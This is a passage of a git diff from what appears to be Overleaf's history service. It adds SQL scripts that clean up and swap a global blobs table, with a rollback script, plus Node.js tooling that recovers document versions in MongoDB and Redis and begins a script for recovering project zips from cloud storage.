('\xfc8841e6386eea3630144b9512e5e45b8663f5ae'), + ('\xfc888dbc27c00a4bd80b595c85707c1b6c1b90e7'), + ('\xfc89b4f955ba74cd9634f54b3fc749d3fd4bf1c7'), + ('\xfc8c0bd2f9ea3a25e35ec7fe71a23aa5688edc8f'), + ('\xfc8d6090ed817d6c0f6351442e2cb8d9d157bd6d'), + ('\xfc8ec43c86340714f6eed800563b5a9ee45f90f0'), + ('\xfc9603cdd682c014b99a944af73dc370dfa2e530'), + ('\xfc97a52864a47c2520b5d1a42d2273f7a5749d13'), + ('\xfc97c5e550cfeea11196445d6c8bb067f8cc08b9'), + ('\xfc9d2364b8699ad76bbf746bcbba1b69f3c0d092'), + ('\xfca966ac658b423176d783d3928494a9471d30da'), + ('\xfcace38a07707c1365e0f0999003d900441089b8'), + ('\xfcaedccc469dd5c39b020e7d10041270290554d3'), + ('\xfcb0be4fa08dd02e4f8d0a033edbfa8c7c0d9576'), + ('\xfcb320b404d93dd9d7e81d1535971d7585066f0c'), + ('\xfcb3d89b68f68ba561ffa4ce70779b528e56c3ad'), + ('\xfcb9e8ca3851f81174a33d44e7a1171135b36e06'), + ('\xfcba96d8253749cc4f027aab0330b20111c962ba'), + ('\xfcce052bc032853982c6150d68adf2b7f900171a'), + ('\xfccf9fe4741baf1fc44e7b6de42c5ab72b119fb1'), + ('\xfcd6a20c23f0c6bee2d1d06f3791ebe2c6e498c5'), + ('\xfcdda8bc334772f445ec93f3c3ece0249ebdad42'), + ('\xfce7b4314c81c0e7b630f6aee4fd97aa5c91ab17'), + ('\xfcede865644795a0f9fe77f320f1c4ec593e6031'), + ('\xfcef647804b9480145a1689a90f0a569acc7105f'), + ('\xfcf0c34ced8cf8fd0ac030c8a5f05d3c61265f67'), + ('\xfcf88ff03dbc262883b11a81fc52bfa437f8725b'), + ('\xfcfa7caf02dcd462fcfb25aa2831afae3d448930'), + ('\xfcfffc1caf5295c4137e3d91de8dae8c65b3872d'), + ('\xfd032ed2583842df2b8c29e7823f6becadfdd5ff'), + ('\xfd057983d788719499bf93702f37e237eef5461d'), + ('\xfd08936e5dc4fc7e38dcbdd8751fd9ad595ecdfc'), + ('\xfd0d4bb214efb086ccb02161e2302ff06ec33893'), + ('\xfd14e842981ef5ff8de7d0b46189b83519f2a391'), + ('\xfd18f999ac8983aa789e9942d80110e88c12a8a5'), + ('\xfd24e0dc0ee504fa73fefe097054edff5bd046a8'), + ('\xfd26b47dbca72dcc604117a7c5011c098f43f757'), + ('\xfd32b0180808cab9cd0bb420f68b2239212c2b2d'), + ('\xfd3343a215a5d3203f1d8439573500b54fb27cc7'), + ('\xfd3a86fbdb2df9f54b3e230665e025a44c8fca41'), + ('\xfd40910d9e70d6412e5e9919bb62a2d649c27a7c'), + ('\xfd41bcf1c4cba814a89bd45b4f5cb814c1d4a70f'), + ('\xfd503493bb4284218c7260d2991259192cfb4bc7'), + ('\xfd58180683f6011b3e6f0af1ebf2ca6be1ca9d5f'), + ('\xfd5e3a48b0aae16b2c057f83a216a86d82170a6d'), + ('\xfd650c0454608742b00510e46d29df17cb2b582d'), + ('\xfd6c906ce15baa7b94f3f82c9245fa9608400d9a'), + ('\xfd70195fb5208e16eb05c2ac1f9260346675fb6e'), + ('\xfd77259724176d78610a6b867cbd8f42ef8a4067'), + ('\xfd79d43bea0293ac1b20e8aca1142627983d2c07'), + ('\xfd7a2d4cb7b7e7c53b55395919a211f78a566800'), + ('\xfd7e23a6d6ce16ee1a872fd9cc1bcc3a9778114f'), + ('\xfd7f850160fbdf73535ddf72ed642ad8b50f2e2c'), + ('\xfd819c4ce8bc9c80dea58467e877dc22070d7d9a'), + ('\xfd85c8d3f6c403421bada2eafa3f8c10f019d3cb'), + ('\xfd88725e98546ad618d5b26dfea81c34471fec25'), + ('\xfd8c3fd200d1fbdc18c992da966fe8ca01154098'), + ('\xfd8d3d189da29404771945c838282c08ccd51d38'), + ('\xfd8de03f807d4713e32c85c5b93d076984bdd4d6'), + ('\xfd9f797efa1524fd1cd5ca58dfd7d21b7c74b7e9'), + ('\xfda34ba5c2e71f0e2b52fde3e31b1254e6757f55'), + ('\xfdac615cdcb1395e9682d25454f27a5e6888fb2b'), + ('\xfdb0d624982d55a6d19c76307b373d6b72001cf8'), + ('\xfdb5f182ef4662610898edf09be15cfa85933e50'), + ('\xfdb885c3f75a361a0c07cf7287589a417a6244d3'), + ('\xfdba81b2f6e3599c5bb95a4fcb8cde478107aeb4'), + ('\xfdc4390580d60f7f65b709aa98b14d82445036d6'), + ('\xfdc59088e656c5b819b25af675dd0ece2373e511'), + ('\xfdca20bc0ba96d6724a08128117556b69af9f0ee'), + ('\xfdca7368dfc0685e8b52dad07a5cb282d234df54'), + ('\xfdcd90ec1fa6382a3bb00bc429af19ad3167cb1b'), + ('\xfdd032e7394cde732ea28e5145e274c289818969'), + ('\xfdd186c911418fda7caa23fec95ed3cd3c3e376d'), + ('\xfdda2f6662fdbf450e068dfeac8b57cc331767c5'), + ('\xfde50a172d973a3f3fc3ed0e6451a51735d23b44'), + ('\xfde99c77df81d50958d490865f7d31db430d52dd'), + ('\xfdea407bcfdf9851e5c94abeb12a2e8c2ea56ad9'), + ('\xfdfc23542f47a51819fd528d6ff32aaeac727ffc'), + ('\xfe0351e1a7111ec6778457dd613667041983bda5'), + ('\xfe0573d73bb16a701faf7fa95e5d21fc32c0b26b'), + ('\xfe07abdce1d799f700b372f12bf6ade37b9a2c4b'), + ('\xfe08a67cd49122c4da6b2ca2c9bd307de45fcee8'), + ('\xfe121990e0c54be2fd07588456d4a1fccbfdb647'), + ('\xfe13bedc364e63671a670f19df865d516f978541'), + ('\xfe15142de620f3e8b07dd766958680fbe2204041'), + ('\xfe166ab4952c9ac02d64c3b58b919e6fe4a2b1a9'), + ('\xfe16c1b2cf3e6ae0485c95addf6a6eb331a731c1'), + ('\xfe1e8e0674662570dcd92fc1e7ae16e8edb311f5'), + ('\xfe1fe8b3e20c1be5a4892b751b9268d693db543b'), + ('\xfe298c97e6bf610ca71d053e55bc44a35104169e'), + ('\xfe2beaa4b8e8eecde1f9e583da6ec1586f31e00e'), + ('\xfe2f194a68361ad610a280cb4a4af7c95d76cfe8'), + ('\xfe2ff0457e95fed12b1c64a73e919cc6c39402c2'), + ('\xfe327111d434771049d639474ada0120eeb1c5de'), + ('\xfe33194987d6a0c93b353ca1f440aafda1513845'), + ('\xfe388e59e29a8c5ea2240a6aef2a59c7b7d35731'), + ('\xfe3fd56d7cf370906f78645fcd68a4ba263e2d28'), + ('\xfe4374fe3cb326d9b0b4bcdb5a9227e55dd4de4c'), + ('\xfe4747b483c23ece3c8f78b93f5ecac0f027c6b5'), + ('\xfe48098734a8223ec79b5ad2f42702c1cbfefa6a'), + ('\xfe4bbad1c6030ed3fca2c7336897087060b21b5a'), + ('\xfe50835e2eaf9f90cb8f52fc5ef2b73045b07a03'), + ('\xfe53ac13ce3f6f55d29d7bf166368fe00dbcc6f0'), + ('\xfe540839ed1e171f3a417b46389257c416f524f1'), + ('\xfe54955d48006649517f57356a552c80a7832119'), + ('\xfe56f57c09ca694dd4a4750055439442d774ab99'), + ('\xfe57aa5560b0d5e74a5ecb750e5956d230a5aa3a'), + ('\xfe57b501307e314d0ce7bb40955c16df2c3c40c8'), + ('\xfe593561f142fbee2603d16d4bad68160643b27b'), + ('\xfe5d9fb72e5b3d01bd1b01d7d0ebb8ace3ff3a2b'), + ('\xfe60b87e7b0cad4703cdf8de7c89cba0649d3981'), + ('\xfe6621ea61de3dae462e32400f07479b2c7f78e0'), + ('\xfe755267c2e61133df01928c38bc55fdccac54bc'), + ('\xfe77766fb1b36a66dd9a7be198789f3532146a64'), + ('\xfe79f8e1a53a1c7a830a67c0c5b7f4169cde79e9'), + ('\xfe81cb7e1af2a884527d16d3e118cf519d976fdc'), + ('\xfe886ec304d3097d946da9ec771c42e121261077'), + ('\xfe8a22af76b792aa7553451be559e9d74de8a5cb'), + ('\xfe8dc5abd36f373e26b90f3da71b35031f71ae54'), + ('\xfe9b63b81e2d069b2316dec4fe212024c89af885'), + ('\xfe9c352c92b4be37689453460fc7bff4540455e3'), + ('\xfe9d102870f9c95d4f545d6ab5025c2cc6ae51d3'), + ('\xfeb602094c3f751bd27e52301c540eaa9db5a05a'), + ('\xfeb9eca9a76d80a41602a17b9961e28abb6068e7'), + ('\xfebc801044d1bec2ca1bdcfc11ff252e72c49993'), + ('\xfebe4e3ea21c6d267afdb3dc7a40d30ac1f92676'), + ('\xfebf5e1fc868d3022126b85da00e759faaf3224a'), + ('\xfec1f8aba1529284e7b50fcd044d5b9d522b7652'), + ('\xfed885fa9c171c97ba3a6dea934eb24ab5626a10'), + ('\xfed8f37013c337e7640b101af0dc3b7afd519807'), + ('\xfeda714160591877eaafa9a8e3f69cc563e9f067'), + ('\xfee375bda1586d0ef2356540b356540d5ae99367'), + ('\xfeea6930b2dbee316039355cf7d377d344b9aad6'), + ('\xfeebdb85efb0049c35028d631b8c98f9dbe3fe1e'), + ('\xfeee739b9a0d27d4d0ae2bdb6d4f31cbef5e342d'), + ('\xfef2f3fe75120a3f21b1deeed4169529f41dbf30'), + ('\xfef43c366c2382f3f30ea362d60e30c9f1c30e97'), + ('\xfefdd8250dfec84bf4c5a30f37cd19e6d18e194a'), + ('\xfefffa6b0b23b1c6777af7012b324b291b77d863'), + ('\xff010d65d1a58ee614e88e2dd35a203d0795858a'), + ('\xff0815cd8c64b0a245ec780eb8d21867509155b5'), + ('\xff08ee48996bee00d1163c184fd2dc0b6ff13e2c'), + ('\xff0d0b91b6ef41468c593a0ca40a81f9a183b055'), + ('\xff11093139174a1e2b1c41da1bf7a8505964dbcb'), + ('\xff13b45fa7ce2836ce8419e230b6b5fbfb078337'), + ('\xff1504bbd2e44c8dfccabcd3445961705f5fd684'), + ('\xff1889977f761701a512247ca1559a69daa3feb2'), + ('\xff18b45594b80decf9efbb45f3d3a600d17a8956'), + ('\xff1ef9fc6f71a198fb323d1df22a581fd1e92660'), + ('\xff2656731c0c8bbb645c4b46b418a9e64c6fd0e0'), + ('\xff27fc8f374780aefeae594c08478a0786167905'), + ('\xff29a7b0f224e6eed27c9254ce5d72897ccf7775'), + ('\xff2e5014510b80cee4e11deb59c66a405006d346'), + ('\xff2eace3e8dc2d207d633fd5b33832ddbfd53d7f'), + ('\xff318a2729cbbf811f18feaccc947c7b0208ec3b'), + ('\xff3194977cda5e96e0c47f4d0d4ef5aef95c0931'), + ('\xff3715aa5056a7195fa73e4948a79b56a03cc26c'), + ('\xff3bb2352b957585b55fe766d3bd0cfcd7b2e056'), + ('\xff400a527effb5757e8986f85398518f6b6450a7'), + ('\xff406407faf7cfc332f7ee664e9e125459912219'), + ('\xff416336a4130eb31fdbb6a4f09ce1ea3389105f'), + ('\xff4341975ae6af5896c4a3446c4008be289edc72'), + ('\xff44369da8682cc96e2d943984e24a7c0efa34a0'), + ('\xff4e760779acccf9f521ca976e20dac50269175c'), + ('\xff54e94130e739f7ba4301fbcf8351590c796a09'), + ('\xff5ec4cba4a353bff8fa2791b7e3a12e457c0811'), + ('\xff62497246cb20f0cf766cf21869bd6926067403'), + ('\xff62edc7b94d88157c62b78fd8d89823b70068b0'), + ('\xff644fd611b080a3c57a854e168557ac466adf7f'), + ('\xff6f9d0f1a38e233998d74122c66ab5c5faed4fe'), + ('\xff700e0077e965b05297e573d414f6f571ae9dc7'), + ('\xff707ddc8ec89bc0b1df4b1f9eef665f63dd442c'), + ('\xff732246f081d4294a5af53ef7a9800c4ca903d2'), + ('\xff732f4e2af57264d7b4c2446607e76f88853363'), + ('\xff79d8b01ca3bf289299d125d0b01be2cec5b9b8'), + ('\xff7a583bad77ccc7a562f0402cf10a24e7c9f4b1'), + ('\xff7b56d38098cc769fe87634c91b84481baece41'), + ('\xff80737d101ccbe09d45a0b7f3cf0241f2f68885'), + ('\xff8435690d4ef628e792d4b3d69f2c21edac1482'), + ('\xff8541f97df3a64cff34a49b493bdecbeb5ad82a'), + ('\xff8755fd7932512e7cbd281bfc137acf2fd90db7'), + ('\xff878c1cfe0a35786c8ab92b99d69e378bc31172'), + ('\xff8e5f977765da43163875788ba02be6a8de7975'), + ('\xff8fb252855f6befaa6fe7b5d61ebca59f260f53'), + ('\xff94c189d199a205f6651409fea994cb8037f9b8'), + ('\xff999b4fc934e4c85e429e110df1debb5677edfc'), + ('\xff9b58b0994ff60b3cf0403aa6a93587202444d8'), + ('\xff9c6a82062f0878be0afb4bf29124521fba8b06'), + ('\xff9fa84f51299c6ca35ca29b9538237120be16b7'), + ('\xffaf6cfa891872cf3ef83e40497f6bf5c7ba70db'), + ('\xffb737cfc18b11cf3b997ad15e553531f1f2f0bc'), + ('\xffb8e77fdf9898b503322015cbd9c3cdbd554568'), + ('\xffbbefbad0ab1dd802534eae62ed5aed1d854f2b'), + ('\xffc31725607d78e99b124e5dccd6b99600fbba3c'), + ('\xffc74bb90ebbf9cc843c3a1c4ce7efa84f154600'), + ('\xffc78ab8bf4b2e88869c1442add3769825b2115b'), + ('\xffce29b962fc0d2c2d400ff2d05fb996bcd1fce8'), + ('\xffd19832e5644d4482b1b2d53fdb3811ffac048c'), + ('\xffd7488e244897b0086fb7e6aa43fbd7d04e3c3c'), + ('\xffdd5670d67c4f5d244a0fd6e8cff913e9cb0b26'), + ('\xffde637ceff0bbbcb8a8e7cf30e4bff0f0e82300'), + ('\xffe7b29deba65d44b9126ffe33300b6038de765e'), + ('\xffe89720a22a747c9c6020b5fe85f496c224279a'), + ('\xffe93a1686957595fcc83f309026324290093032'), + ('\xffe9d8a251a403ecc1b29c29985a2f38a4c424dc'), + ('\xfffdbafeb73c497ea3d84107162ba05e829c59ef'), + ('\xfffe608c967afafbdd7be93b6d7704a2754864fc'); diff --git a/services/history-v1/storage/scripts/global-blobs-db-cleanup/02-set-global-flag.sql b/services/history-v1/storage/scripts/global-blobs-db-cleanup/02-set-global-flag.sql new file mode 100644 index 0000000..577fcb5 --- /dev/null +++ b/services/history-v1/storage/scripts/global-blobs-db-cleanup/02-set-global-flag.sql @@ -0,0 +1,3 @@ +UPDATE blobs +SET global = TRUE +WHERE hash_bytes IN (SELECT hash_bytes FROM global_blob_hashes); diff --git a/services/history-v1/storage/scripts/global-blobs-db-cleanup/03-create-global-blobs-table.sql b/services/history-v1/storage/scripts/global-blobs-db-cleanup/03-create-global-blobs-table.sql new file mode 100644 index 0000000..9e708ea --- /dev/null +++ b/services/history-v1/storage/scripts/global-blobs-db-cleanup/03-create-global-blobs-table.sql @@ -0,0 +1,16 @@ +CREATE TABLE global_blobs ( + hash_bytes bytea NOT NULL, + byte_length integer NOT NULL, + string_length integer, + global boolean, + CONSTRAINT global_blobs_pkey PRIMARY KEY (hash_bytes), + CONSTRAINT global_blobs_byte_length_non_negative + CHECK (byte_length >= 0), + CONSTRAINT global_blobs_string_length_non_negative + CHECK (string_length IS NULL OR string_length >= 0) +); + +INSERT INTO global_blobs (hash_bytes, byte_length, string_length, global) +SELECT hash_bytes, byte_length, string_length, true +FROM blobs +WHERE hash_bytes IN (SELECT hash_bytes FROM global_blob_hashes); diff --git a/services/history-v1/storage/scripts/global-blobs-db-cleanup/04-swap-global-blob-tables.sql b/services/history-v1/storage/scripts/global-blobs-db-cleanup/04-swap-global-blob-tables.sql new file mode 100644 index 0000000..8ceabd8 --- /dev/null +++ b/services/history-v1/storage/scripts/global-blobs-db-cleanup/04-swap-global-blob-tables.sql @@ -0,0 +1,22 @@ +BEGIN; + ALTER TABLE blobs RENAME TO old_blobs; + ALTER TABLE global_blobs RENAME TO blobs; + + ALTER TABLE old_blobs + RENAME CONSTRAINT blobs_pkey TO old_blobs_pkey; + ALTER TABLE old_blobs + RENAME CONSTRAINT blobs_byte_length_non_negative + TO old_blobs_byte_length_non_negative; + ALTER TABLE old_blobs + RENAME CONSTRAINT blobs_string_length_non_negative + TO old_blobs_string_length_non_negative; + + ALTER TABLE blobs + RENAME CONSTRAINT global_blobs_pkey TO blobs_pkey; + ALTER TABLE blobs + RENAME CONSTRAINT global_blobs_byte_length_non_negative + TO blobs_byte_length_non_negative; + ALTER TABLE blobs + RENAME CONSTRAINT global_blobs_string_length_non_negative + TO blobs_string_length_non_negative; +COMMIT; diff --git a/services/history-v1/storage/scripts/global-blobs-db-cleanup/README.md b/services/history-v1/storage/scripts/global-blobs-db-cleanup/README.md new file mode 100644 index 0000000..7460d4d --- /dev/null +++ b/services/history-v1/storage/scripts/global-blobs-db-cleanup/README.md @@ -0,0 +1,9 @@ +Scripts in this directory were used when we cleaned up the global blobs table, +ensuring that it only contained global blobs. The scripts are meant to be run in this order: + +* `01-create-blob-hashes-table.sql` +* `02-set-global-flag.sql` +* `03-create-global-blobs-table.sql` +* `04-swap-global-blob-tables.sql` + +The `rollback.sql` can be run to reverse the effect of `03-swap-global-blob-tables.sql`. diff --git a/services/history-v1/storage/scripts/global-blobs-db-cleanup/rollback.sql b/services/history-v1/storage/scripts/global-blobs-db-cleanup/rollback.sql new file mode 100644 index 0000000..c8d5e8f --- /dev/null +++ b/services/history-v1/storage/scripts/global-blobs-db-cleanup/rollback.sql @@ -0,0 +1,22 @@ +BEGIN; + ALTER TABLE blobs RENAME TO global_blobs; + ALTER TABLE old_blobs RENAME TO blobs; + + ALTER TABLE global_blobs + RENAME CONSTRAINT blobs_pkey TO global_blobs_pkey; + ALTER TABLE global_blobs + RENAME CONSTRAINT blobs_byte_length_non_negative + TO global_blobs_byte_length_non_negative; + ALTER TABLE global_blobs + RENAME CONSTRAINT blobs_string_length_non_negative + TO global_blobs_string_length_non_negative; + + ALTER TABLE blobs + RENAME CONSTRAINT old_blobs_pkey TO blobs_pkey; + ALTER TABLE blobs + RENAME CONSTRAINT old_blobs_byte_length_non_negative + TO blobs_byte_length_non_negative; + ALTER TABLE blobs + RENAME CONSTRAINT old_blobs_string_length_non_negative + TO blobs_string_length_non_negative; +COMMIT; diff --git a/services/history-v1/storage/scripts/recover_doc_versions.js b/services/history-v1/storage/scripts/recover_doc_versions.js new file mode 100644 index 0000000..f121c60 --- /dev/null +++ b/services/history-v1/storage/scripts/recover_doc_versions.js @@ -0,0 +1,379 @@ +const fsPromises = require('node:fs/promises') +const { ObjectId } = require('mongodb') +const BPromise = require('bluebird') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const mongodb = require('../lib/mongodb') +const { chunkStore } = require('..') +const Events = require('node:events') + +// Silence warning. +Events.setMaxListeners(20) + +const BATCH_SIZE = 1000 +const OPTIONS = { + concurrency: parseInt(process.env.DOC_VERSION_RECOVERY_CONCURRENCY, 10) || 20, + force: process.env.DOC_VERSION_RECOVERY_FORCE === 'true', + 'skip-history-failures': + process.env.DOC_VERSION_RECOVERY_SKIP_HISTORY_FAILURES === 'true', + 'resyncs-needed-file': process.env.DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE, +} + +const db = { + deletedProjects: mongodb.db.collection('deletedProjects'), + docs: mongodb.db.collection('docs'), + migrations: mongodb.db.collection('migrations'), + projects: mongodb.db.collection('projects'), +} + +const BAD_MIGRATION_NAME = + '20231219081700_move_doc_versions_from_docops_to_docs' + +const RECOVERY_FILES_502 = [ + '/var/lib/overleaf/data/history/doc-version-recovery-resyncs.log', + '/var/lib/overleaf/data/history/doc-version-recovery-resyncs.log.done', +] + +let loggingChain = Promise.resolve() +const projectIdsThatNeedResyncing = [] +const unflushedDocIds = new Set() + +async function flushLogQueue() { + const logPath = OPTIONS['resyncs-needed-file'] + loggingChain = loggingChain.then(async () => { + const batch = projectIdsThatNeedResyncing.splice(0) + if (batch.length === 0) return + try { + await fsPromises.appendFile(logPath, batch.join('\n') + '\n') + } catch (err) { + projectIdsThatNeedResyncing.push(...batch) + logger.err({ err, logPath, batch }, 'Failed to write to log file') + } + }) + await loggingChain +} +async function recordProjectNeedsResync(projectId) { + if (OPTIONS['resyncs-needed-file']) { + projectIdsThatNeedResyncing.push(projectId) + await flushLogQueue() + } else { + console.log(`Project ${projectId} needs a hard resync.`) + } +} + +async function main() { + const recovery502Ran = await did502RecoveryRun() + await getUnflushedDocIds() + const badMigration = await db.migrations.findOne({ name: BAD_MIGRATION_NAME }) + + if (unflushedDocIds.size > 0 && !recovery502Ran && badMigration != null) { + // Tell customers that they need to flush + console.log(` +-------------------------------------------------------------------- +Detected unflushed changes while recovering doc versions. +Please go back to version 5.0.1 and follow the recovery procedure +for flushing document updates: + +https://github.com/overleaf/overleaf/wiki/Doc-version-recovery +--------------------------------------------------------------------`) + process.exit(1) + } + + if (OPTIONS.force || recovery502Ran || badMigration != null) { + console.warn('Need to recover doc versions. This will take a while.') + await runRecovery() + await db.migrations.deleteOne({ name: BAD_MIGRATION_NAME }) + await delete502RecoveryFiles() + } + + console.log('Done.') +} + +async function did502RecoveryRun() { + for (const file of RECOVERY_FILES_502) { + try { + await fsPromises.stat(file) + return true + } catch (err) { + // file doesn't exist. continue + } + } + return false +} + +async function delete502RecoveryFiles() { + for (const file of RECOVERY_FILES_502) { + try { + await fsPromises.rename(file, file.replace('.log', '-5.0.2.log')) + } catch (err) { + // file doesn't exist. continue + } + } +} + +async function runRecovery() { + let batch = [] + const summary = { + ignored: 0, + skipped: 0, + deletedUpdatedMongo: 0, + deletedUpdatedRedis: 0, + deletedUpdatedBoth: 0, + deletedIgnored: 0, + updatedMongo: 0, + updatedRedis: 0, + updatedBoth: 0, + } + const processBatchAndLogProgress = async () => { + try { + await BPromise.map(batch, project => processProject(project, summary), { + concurrency: OPTIONS.concurrency, + }) + } finally { + console.log(`${summary.updatedRedis} projects updated in Redis`) + console.log(`${summary.updatedMongo} projects updated in Mongo`) + console.log( + `${summary.updatedBoth} projects updated in both Mongo and Redis` + ) + console.log(`${summary.ignored} projects had good versions`) + console.log( + `${summary.deletedUpdatedMongo} deleted projects updated in Mongo` + ) + console.log( + `${summary.deletedUpdatedRedis} deleted projects updated in Redis` + ) + console.log( + `${summary.deletedUpdatedBoth} deleted projects updated in both Mongo and Redis` + ) + console.log( + `${summary.deletedIgnored} deleted projects had good versions` + ) + console.log(`${summary.skipped} projects skipped`) + } + batch = [] + } + + await printDBStats() + await initResyncsNeededFile() + for await (const project of getProjects()) { + batch.push(project) + if (batch.length >= BATCH_SIZE) { + await processBatchAndLogProgress() + } + } + + for await (const deletedProject of getDeletedProjects()) { + const project = deletedProject.project + project.isDeleted = true + batch.push(project) + if (batch.length >= BATCH_SIZE) { + await processBatchAndLogProgress() + } + } + + if (batch.length > 0) { + await processBatchAndLogProgress() + } + + await backfillMissingVersions() +} + +async function getUnflushedDocIds() { + const batchSize = 1000 + let cursor = '0' + do { + const [newCursor, keys] = await rclient.scan( + cursor, + 'MATCH', + Settings.redis.documentupdater.key_schema.docVersion({ doc_id: '*' }), + 'COUNT', + batchSize + ) + for (const key of keys) { + unflushedDocIds.add(key.slice('DocVersion:'.length)) + } + cursor = newCursor + } while (cursor !== '0') +} + +async function printDBStats() { + const projects = await db.projects.estimatedDocumentCount() + const deletedProjects = await db.deletedProjects.countDocuments() + const docs = await db.docs.estimatedDocumentCount() + console.log( + `Need to check ${projects} projects and up-to ${deletedProjects} deleted projects with a total of ${docs} docs.` + ) +} + +async function initResyncsNeededFile() { + const logPath = OPTIONS['resyncs-needed-file'] + if (logPath) { + await fsPromises.writeFile(logPath, '') + await fsPromises.rm(`${logPath}.done`, { force: true }) + } +} + +function getProjects() { + return db.projects.find({}, { projection: { _id: 1, overleaf: 1 } }) +} + +function getDeletedProjects() { + return db.deletedProjects.find( + { 'project.overleaf.history.id': { $exists: true } }, + { projection: { 'project._id': 1, 'project.overleaf': 1 } } + ) +} + +async function processProject(project, summary) { + const projectId = project._id.toString() + let updatedMongo = false + let updatedRedis = false + try { + const historyDocVersions = await getHistoryDocVersions(project) + + for (const { docId, version } of historyDocVersions) { + const update = await fixDocVersion(docId, version) + if (update != null) { + if (update.in === 'mongo') { + updatedMongo = true + } else if (update.in === 'redis') { + updatedRedis = true + } + } + } + + if (project.isDeleted) { + if (updatedMongo && updatedRedis) { + summary.deletedUpdatedBoth += 1 + } else if (updatedMongo) { + summary.deletedUpdatedMongo += 1 + } else if (updatedRedis) { + summary.deletedUpdatedRedis += 1 + } else { + summary.deletedIgnored += 1 + } + } else { + await recordProjectNeedsResync(projectId) + if (updatedMongo && updatedRedis) { + summary.updatedBoth += 1 + } else if (updatedMongo) { + summary.updatedMongo += 1 + } else if (updatedRedis) { + summary.updatedRedis += 1 + } else { + summary.ignored += 1 + } + } + } catch (err) { + logger.error({ err, projectId }, 'Failed to process project') + if (OPTIONS['skip-history-failures']) { + summary.skipped += 1 + } else { + throw err + } + } +} + +async function getHistoryDocVersions(project) { + const historyId = project.overleaf.history.id + const chunk = await chunkStore.loadLatest(historyId) + if (chunk == null) { + return [] + } + + const snapshot = chunk.getSnapshot() + const changes = chunk.getChanges() + snapshot.applyAll(changes) + const v2DocVersions = snapshot.getV2DocVersions() + if (v2DocVersions == null) { + return [] + } + return Object.entries(v2DocVersions.data).map(([docId, versionInfo]) => ({ + docId, + version: versionInfo.v, + })) +} + +async function fixDocVersion(docId, historyVersion) { + const redisVersion = await getRedisDocVersion(docId) + if (redisVersion != null && historyVersion >= redisVersion) { + await setRedisDocVersion(docId, historyVersion + 1) + return { + in: 'redis', + previousVersion: redisVersion, + newVersion: historyVersion + 1, + } + } else { + const docBeforeUpdate = await db.docs.findOneAndUpdate( + { + _id: new ObjectId(docId), + $or: [ + { version: { $lte: historyVersion } }, + { version: { $exists: false } }, + ], + }, + { $set: { version: historyVersion + 1 } }, + { projection: { _id: 1, version: 1 } } + ) + + if (docBeforeUpdate != null) { + return { + in: 'mongo', + previousVersion: docBeforeUpdate.version, + newVersion: historyVersion + 1, + } + } else { + return null + } + } +} + +async function getRedisDocVersion(docId) { + if (!unflushedDocIds.has(docId)) { + return null + } + const result = await rclient.get( + Settings.redis.documentupdater.key_schema.docVersion({ doc_id: docId }) + ) + if (result == null) { + return null + } + return parseInt(result, 10) +} + +async function setRedisDocVersion(docId, version) { + const multi = rclient.multi() + multi.set( + Settings.redis.documentupdater.key_schema.docVersion({ doc_id: docId }), + version + ) + multi.set(`UnflushedTime:{${docId}}`, Date.now(), 'NX') + await multi.exec() +} + +/** + * Set all remaining versions to 0 + */ +async function backfillMissingVersions() { + console.log('Defaulting version to 0 for remaining docs.') + await db.docs.updateMany( + { version: { $exists: false } }, + { $set: { version: 0 } } + ) +} + +main() + .finally(async () => { + console.log('Flushing log queue.') + await flushLogQueue() + }) + .then(() => { + process.exit(0) + }) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/services/history-v1/storage/scripts/recover_zip.js b/services/history-v1/storage/scripts/recover_zip.js new file mode 100644 index 0000000..91872c0 --- /dev/null +++ b/services/history-v1/storage/scripts/recover_zip.js @@ -0,0 +1,255 @@ +/** + * Try to recover a zip of the latest version of a project using only data in + * GCS, where this data may have been (recently) hard deleted (i.e. may exist + * wholely or in part as non-current versions). This should be able to + * retrieve the latest content of a project up to 180 days after it was + * deleted. + * + * Usage: + * node recover_zip.js [--verbose] <HISTORY_ID> <HISTORY_ID> ... + * + * Output: + * Signed URL(s) for the uploaded zip files. Note that these are valid for + * only 24h, to match the lifecycle rule on the zip bucket. + */ + +const fs = require('node:fs') +const os = require('node:os') +const path = require('node:path') +const util = require('node:util') + +// Something is registering 11 listeners, over the limit of 10, which generates +// a lot of warning noise. +require('node:events').EventEmitter.defaultMaxListeners = 11 + +const config = require('config') +// We depend on this via object-persistor. +// eslint-disable-next-line import/no-extraneous-dependencies +const { Storage } = require('@google-cloud/storage') +const isValidUtf8 = require('utf-8-validate') + +const core = require('overleaf-editor-core') +const projectKey = require('../lib/project_key') +const streams = require('../lib/streams') +const ProjectArchive = require('../lib/project_archive') + +const { + values: { verbose: VERBOSE }, + positionals: HISTORY_IDS, +} = util.parseArgs({ + options: { + verbose: { + type: 'boolean', + default: false, + }, + }, + allowPositionals: true, +}) + +if (HISTORY_IDS.length === 0) { + console.error('no history IDs; see usage') + process.exit(1) +} + +async function listDeletedChunks(historyId) { + const bucketName = config.get('chunkStore.bucket') + const storage = new Storage() + const [files] = await storage.bucket(bucketName).getFiles({ + prefix: projectKey.format(historyId), + versions: true, + }) + return files +} + +async function findLatestChunk(historyId) { + const files = await listDeletedChunks(historyId) + if (files.length === 0) return null + files.sort((a, b) => { + if (a.name < b.name) return -1 + if (a.name > b.name) return 1 + return 0 + }) + return files[files.length - 1] +} + +async function downloadLatestChunk(tmp, historyId) { + const latestChunkFile = await findLatestChunk(historyId) + if (!latestChunkFile) throw new Error('no chunk found to recover') + + const destination = path.join(tmp, 'latest.json') + await latestChunkFile.download({ destination }) + return destination +} + +async function loadHistory(historyPathname) { + const data = await fs.promises.readFile(historyPathname) + const rawHistory = JSON.parse(data) + return core.History.fromRaw(rawHistory) +} + +async function loadChunk(historyPathname, blobStore) { + const history = await loadHistory(historyPathname) + + const blobHashes = new Set() + history.findBlobHashes(blobHashes) + + await blobStore.fetchBlobs(blobHashes) + await history.loadFiles('lazy', blobStore) + + return new core.Chunk(history, 0) +} + +// TODO: it would be nice to export / expose this from BlobStore; +// currently this is a copy of the method there. +async function getStringLengthOfFile(byteLength, pathname) { + // We have to read the file into memory to get its UTF-8 length, so don't + // bother for files that are too large for us to edit anyway. + if (byteLength > core.Blob.MAX_EDITABLE_BYTE_LENGTH_BOUND) { + return null + } + + // We need to check if the file contains nonBmp or null characters + let data = await fs.promises.readFile(pathname) + if (!isValidUtf8(data)) return null + data = data.toString() + if (data.length > core.TextOperation.MAX_STRING_LENGTH) return null + if 